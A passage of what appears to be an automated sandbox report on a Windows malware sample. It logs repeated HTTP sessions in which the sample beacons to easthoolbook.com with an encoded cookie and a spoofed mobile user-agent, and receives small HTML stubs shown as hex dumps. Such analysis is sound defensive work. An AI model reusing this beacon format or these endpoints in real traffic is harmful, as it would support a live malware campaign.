                                                                          2024-04-19 13:32:21 UTC600INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 27 69 65 20 69 65 37 27 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 27 69 65 20 69 65 38 27 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 37 29 20 7c 20 21 28 49 45 20 38 29 20 20 5d 3e 3c 21 2d 2d 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 20 20 20 20 3c 68 65 61 64 3e 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 27 55 54 46 2d 38 27 20 2f 3e 20 20 20 20 20 20 20 20 3c
                                                                          Data Ascii: <!DOCTYPE html>...[if IE 7]><html class='ie ie7' lang='en-US'><![endif]-->...[if IE 8]><html class='ie ie8' lang='en-US'><![endif]-->...[if !(IE 7) | !(IE 8) ]>...><html lang='en-US'>...<![endif]--> <head> <meta charset='UTF-8' /> <


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          27192.168.2.64973689.150.57.464436516C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-04-19 13:32:23 UTC517OUTGET /sign.mpeg?dare=true HTTP/1.1
                                                                          Host: easthoolbook.com
                                                                          Accept: application/xml
                                                                          Cookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==
                                                                          User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36
                                                                          Connection: Close
                                                                          Cache-Control: no-cache
                                                                          2024-04-19 13:32:24 UTC141INHTTP/1.1 200 OK
                                                                          Date: Fri, 19 Apr 2024 13:29:42 GMT
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Server: cloudflare
                                                                          Content-Length: 600
                                                                          2024-04-19 13:32:24 UTC600INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 27 69 65 20 69 65 37 27 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 27 69 65 20 69 65 38 27 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 37 29 20 7c 20 21 28 49 45 20 38 29 20 20 5d 3e 3c 21 2d 2d 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 20 20 20 20 3c 68 65 61 64 3e 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 27 55 54 46 2d 38 27 20 2f 3e 20 20 20 20 20 20 20 20 3c
                                                                          Data Ascii: <!DOCTYPE html>...[if IE 7]><html class='ie ie7' lang='en-US'><![endif]-->...[if IE 8]><html class='ie ie8' lang='en-US'><![endif]-->...[if !(IE 7) | !(IE 8) ]>...><html lang='en-US'>...<![endif]--> <head> <meta charset='UTF-8' /> <


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          28192.168.2.64973789.150.57.464436516C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-04-19 13:32:26 UTC517OUTGET /sign.mpeg?dare=true HTTP/1.1
                                                                          Host: easthoolbook.com
                                                                          Accept: application/xml
                                                                          Cookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==
                                                                          User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36
                                                                          Connection: Close
                                                                          Cache-Control: no-cache
                                                                          2024-04-19 13:32:27 UTC141INHTTP/1.1 200 OK
                                                                          Date: Fri, 19 Apr 2024 13:29:45 GMT
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Server: cloudflare
                                                                          Content-Length: 600
                                                                          2024-04-19 13:32:27 UTC600INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 27 69 65 20 69 65 37 27 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 27 69 65 20 69 65 38 27 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 37 29 20 7c 20 21 28 49 45 20 38 29 20 20 5d 3e 3c 21 2d 2d 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 20 20 20 20 3c 68 65 61 64 3e 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 27 55 54 46 2d 38 27 20 2f 3e 20 20 20 20 20 20 20 20 3c
                                                                          Data Ascii: <!DOCTYPE html>...[if IE 7]><html class='ie ie7' lang='en-US'><![endif]-->...[if IE 8]><html class='ie ie8' lang='en-US'><![endif]-->...[if !(IE 7) | !(IE 8) ]>...><html lang='en-US'>...<![endif]--> <head> <meta charset='UTF-8' /> <


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          29192.168.2.64973889.150.57.464436516C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-04-19 13:32:29 UTC517OUTGET /sign.mpeg?dare=true HTTP/1.1
                                                                          Host: easthoolbook.com
                                                                          Accept: application/xml
                                                                          Cookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==
                                                                          User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36
                                                                          Connection: Close
                                                                          Cache-Control: no-cache
                                                                          2024-04-19 13:32:30 UTC141INHTTP/1.1 200 OK
                                                                          Date: Fri, 19 Apr 2024 13:29:48 GMT
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Server: cloudflare
                                                                          Content-Length: 600
                                                                          2024-04-19 13:32:30 UTC600INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 27 69 65 20 69 65 37 27 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 27 69 65 20 69 65 38 27 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 37 29 20 7c 20 21 28 49 45 20 38 29 20 20 5d 3e 3c 21 2d 2d 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 20 20 20 20 3c 68 65 61 64 3e 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 27 55 54 46 2d 38 27 20 2f 3e 20 20 20 20 20 20 20 20 3c
                                                                          Data Ascii: <!DOCTYPE html>...[if IE 7]><html class='ie ie7' lang='en-US'><![endif]-->...[if IE 8]><html class='ie ie8' lang='en-US'><![endif]-->...[if !(IE 7) | !(IE 8) ]>...><html lang='en-US'>...<![endif]--> <head> <meta charset='UTF-8' /> <


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          30192.168.2.64973989.150.57.464436516C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-04-19 13:32:32 UTC517OUTGET /sign.mpeg?dare=true HTTP/1.1
                                                                          Host: easthoolbook.com
                                                                          Accept: application/xml
                                                                          Cookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==
                                                                          User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36
                                                                          Connection: Close
                                                                          Cache-Control: no-cache
                                                                          2024-04-19 13:32:33 UTC141INHTTP/1.1 200 OK
                                                                          Date: Fri, 19 Apr 2024 13:29:51 GMT
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Server: cloudflare
                                                                          Content-Length: 600
                                                                          2024-04-19 13:32:33 UTC600INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 27 69 65 20 69 65 37 27 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 27 69 65 20 69 65 38 27 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 37 29 20 7c 20 21 28 49 45 20 38 29 20 20 5d 3e 3c 21 2d 2d 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 20 20 20 20 3c 68 65 61 64 3e 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 27 55 54 46 2d 38 27 20 2f 3e 20 20 20 20 20 20 20 20 3c
                                                                          Data Ascii: <!DOCTYPE html>...[if IE 7]><html class='ie ie7' lang='en-US'><![endif]-->...[if IE 8]><html class='ie ie8' lang='en-US'><![endif]-->...[if !(IE 7) | !(IE 8) ]>...><html lang='en-US'>...<![endif]--> <head> <meta charset='UTF-8' /> <


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          31192.168.2.64974089.150.57.464436516C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-04-19 13:32:35 UTC517OUTGET /sign.mpeg?dare=true HTTP/1.1
                                                                          Host: easthoolbook.com
                                                                          Accept: application/xml
                                                                          Cookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==
                                                                          User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36
                                                                          Connection: Close
                                                                          Cache-Control: no-cache
                                                                          2024-04-19 13:32:36 UTC141INHTTP/1.1 200 OK
                                                                          Date: Fri, 19 Apr 2024 13:29:54 GMT
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Server: cloudflare
                                                                          Content-Length: 600
                                                                          2024-04-19 13:32:36 UTC600INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 27 69 65 20 69 65 37 27 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 27 69 65 20 69 65 38 27 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 37 29 20 7c 20 21 28 49 45 20 38 29 20 20 5d 3e 3c 21 2d 2d 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 20 20 20 20 3c 68 65 61 64 3e 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 27 55 54 46 2d 38 27 20 2f 3e 20 20 20 20 20 20 20 20 3c
                                                                          Data Ascii: <!DOCTYPE html>...[if IE 7]><html class='ie ie7' lang='en-US'><![endif]-->...[if IE 8]><html class='ie ie8' lang='en-US'><![endif]-->...[if !(IE 7) | !(IE 8) ]>...><html lang='en-US'>...<![endif]--> <head> <meta charset='UTF-8' /> <


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          32192.168.2.64974189.150.57.464436516C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-04-19 13:32:40 UTC517OUTGET /sign.mpeg?dare=true HTTP/1.1
                                                                          Host: easthoolbook.com
                                                                          Accept: application/xml
                                                                          Cookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==
                                                                          User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36
                                                                          Connection: Close
                                                                          Cache-Control: no-cache
                                                                          2024-04-19 13:32:40 UTC141INHTTP/1.1 200 OK
                                                                          Date: Fri, 19 Apr 2024 13:29:59 GMT
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Server: cloudflare
                                                                          Content-Length: 600
                                                                          2024-04-19 13:32:40 UTC600INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 27 69 65 20 69 65 37 27 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 27 69 65 20 69 65 38 27 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 37 29 20 7c 20 21 28 49 45 20 38 29 20 20 5d 3e 3c 21 2d 2d 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 20 20 20 20 3c 68 65 61 64 3e 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 27 55 54 46 2d 38 27 20 2f 3e 20 20 20 20 20 20 20 20 3c
                                                                          Data Ascii: <!DOCTYPE html>...[if IE 7]><html class='ie ie7' lang='en-US'><![endif]-->...[if IE 8]><html class='ie ie8' lang='en-US'><![endif]-->...[if !(IE 7) | !(IE 8) ]>...><html lang='en-US'>...<![endif]--> <head> <meta charset='UTF-8' /> <


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          33192.168.2.64974289.150.57.464436516C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-04-19 13:32:43 UTC517OUTGET /sign.mpeg?dare=true HTTP/1.1
                                                                          Host: easthoolbook.com
                                                                          Accept: application/xml
                                                                          Cookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==
                                                                          User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36
                                                                          Connection: Close
                                                                          Cache-Control: no-cache
                                                                          2024-04-19 13:32:43 UTC141INHTTP/1.1 200 OK
                                                                          Date: Fri, 19 Apr 2024 13:30:02 GMT
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Server: cloudflare
                                                                          Content-Length: 600
                                                                          2024-04-19 13:32:43 UTC600INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 27 69 65 20 69 65 37 27 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 27 69 65 20 69 65 38 27 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 37 29 20 7c 20 21 28 49 45 20 38 29 20 20 5d 3e 3c 21 2d 2d 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 20 20 20 20 3c 68 65 61 64 3e 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 27 55 54 46 2d 38 27 20 2f 3e 20 20 20 20 20 20 20 20 3c
                                                                          Data Ascii: <!DOCTYPE html>...[if IE 7]><html class='ie ie7' lang='en-US'><![endif]-->...[if IE 8]><html class='ie ie8' lang='en-US'><![endif]-->...[if !(IE 7) | !(IE 8) ]>...><html lang='en-US'>...<![endif]--> <head> <meta charset='UTF-8' /> <


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          34192.168.2.64974389.150.57.464436516C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-04-19 13:32:46 UTC517OUTGET /sign.mpeg?dare=true HTTP/1.1
                                                                          Host: easthoolbook.com
                                                                          Accept: application/xml
                                                                          Cookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==
                                                                          User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36
                                                                          Connection: Close
                                                                          Cache-Control: no-cache
                                                                          2024-04-19 13:32:46 UTC141INHTTP/1.1 200 OK
                                                                          Date: Fri, 19 Apr 2024 13:30:05 GMT
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Server: cloudflare
                                                                          Content-Length: 600
                                                                          2024-04-19 13:32:46 UTC600INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 27 69 65 20 69 65 37 27 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 27 69 65 20 69 65 38 27 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 37 29 20 7c 20 21 28 49 45 20 38 29 20 20 5d 3e 3c 21 2d 2d 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 20 20 20 20 3c 68 65 61 64 3e 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 27 55 54 46 2d 38 27 20 2f 3e 20 20 20 20 20 20 20 20 3c
                                                                          Data Ascii: <!DOCTYPE html>...[if IE 7]><html class='ie ie7' lang='en-US'><![endif]-->...[if IE 8]><html class='ie ie8' lang='en-US'><![endif]-->...[if !(IE 7) | !(IE 8) ]>...><html lang='en-US'>...<![endif]--> <head> <meta charset='UTF-8' /> <


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          35192.168.2.64974489.150.57.464436516C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-04-19 13:32:49 UTC517OUTGET /sign.mpeg?dare=true HTTP/1.1
                                                                          Host: easthoolbook.com
                                                                          Accept: application/xml
                                                                          Cookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==
                                                                          User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36
                                                                          Connection: Close
                                                                          Cache-Control: no-cache
                                                                          2024-04-19 13:32:49 UTC141INHTTP/1.1 200 OK
                                                                          Date: Fri, 19 Apr 2024 13:30:08 GMT
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Server: cloudflare
                                                                          Content-Length: 600
                                                                          2024-04-19 13:32:49 UTC600INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 27 69 65 20 69 65 37 27 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 27 69 65 20 69 65 38 27 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 37 29 20 7c 20 21 28 49 45 20 38 29 20 20 5d 3e 3c 21 2d 2d 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 20 20 20 20 3c 68 65 61 64 3e 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 27 55 54 46 2d 38 27 20 2f 3e 20 20 20 20 20 20 20 20 3c
                                                                          Data Ascii: <!DOCTYPE html>...[if IE 7]><html class='ie ie7' lang='en-US'><![endif]-->...[if IE 8]><html class='ie ie8' lang='en-US'><![endif]-->...[if !(IE 7) | !(IE 8) ]>...><html lang='en-US'>...<![endif]--> <head> <meta charset='UTF-8' /> <


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          36192.168.2.64974589.150.57.464436516C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-04-19 13:32:52 UTC517OUTGET /sign.mpeg?dare=true HTTP/1.1
                                                                          Host: easthoolbook.com
                                                                          Accept: application/xml
                                                                          Cookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==
                                                                          User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36
                                                                          Connection: Close
                                                                          Cache-Control: no-cache
                                                                          2024-04-19 13:32:52 UTC141INHTTP/1.1 200 OK
                                                                          Date: Fri, 19 Apr 2024 13:30:11 GMT
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Server: cloudflare
                                                                          Content-Length: 600
